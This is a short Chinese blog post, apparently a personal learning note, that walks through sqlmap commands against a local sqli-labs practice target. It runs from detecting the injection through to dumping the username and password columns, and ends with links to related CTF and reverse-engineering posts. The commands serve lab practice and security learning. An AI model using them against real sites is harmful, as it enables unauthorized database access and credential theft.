zoukankan html css js c++ java

【20171116早】sqlmap 扫描sql注入漏洞

sqlmap发现并利用sql注入的利器，值得记录使用过程：

1、检测是否存在漏洞：
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3
2、获取数据库信息：
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1"  --dbms mysql --level 3 --dbs
3、数据库表信息：
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1"  --dbms mysql --level 3 -D security --tables
4、表中字段信息
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users --columns
5、字段值数据
sqlmap -u "http://192.168.162.135/sqli-libs/Less-1/?id=1" --dbms mysql --level 3 -D security -T users -C "username,password" --dump

查看全文

相关阅读:
【日记】200617 今天开始写日记了
 近期未复现比赛汇总
 2021NSCTF RE WP
2021国赛CISCN 初赛部分REwriteup
对流氓APP——一份礼物.apk的逆向分析
 RE之攻防世界 maze
RE-攻防世界 logmein
RE-攻防世界 T4 simple-unpack
安天逆向工程课程 U1
RE-攻防世界 simple-unpack

原文地址：https://www.cnblogs.com/heijuelou/p/7842562.html